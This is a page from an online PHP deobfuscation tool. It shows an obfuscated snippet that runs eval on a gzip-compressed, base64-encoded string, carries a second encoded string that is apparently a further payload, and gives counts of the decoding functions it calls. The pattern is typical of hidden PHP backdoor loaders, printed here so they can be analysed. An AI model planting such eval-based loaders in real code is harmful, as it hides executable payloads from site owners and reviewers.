Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $Cyto = "Sy1LzNFQt1dLL7FW10uvKs1Lzs8tKEotLtZIr8rMS8tJLElFYiUlFqeamcSnpCbnp6RqFJcUF..
Decoded Output download
<?php
$Cyto = "Sy1LzNFQt1dLL7FW10uvKs1Lzs8tKEotLtZIr8rMS8tJLElFYiUlFqeamcSnpCbnp6RqFJcUFaWWaaj4ZFZogoE1AA==";
$Lix = "=chCf+OACA1VwKFUXhszNpU5iX+5wSFcMAHV3TXcwf190zIcwT180D/VXLd5gjCyvE7sci3/LDANB8vxAkTA";
eval(htmlspecialchars_decode(gzinflate(base64_decode($Cyto))));
exit;
?>
Did this file decode correctly?
Original Code
<?php
$Cyto = "Sy1LzNFQt1dLL7FW10uvKs1Lzs8tKEotLtZIr8rMS8tJLElFYiUlFqeamcSnpCbnp6RqFJcUFaWWaaj4ZFZogoE1AA==";
$Lix = "=chCf+OACA1VwKFUXhszNpU5iX+5wSFcMAHV3TXcwf190zIcwT180D/VXLd5gjCyvE7sci3/LDANB8vxAkTA";
eval(htmlspecialchars_decode(gzinflate(base64_decode($Cyto))));
exit;
?>
Function Calls
gzinflate | 1 |
base64_decode | 1 |
htmlspecialchars_decode | 1 |
Stats
MD5 | 3fd1266268bcfbd484bda2cadf803479 |
Eval Count | 0 |
Decode Time | 56 ms |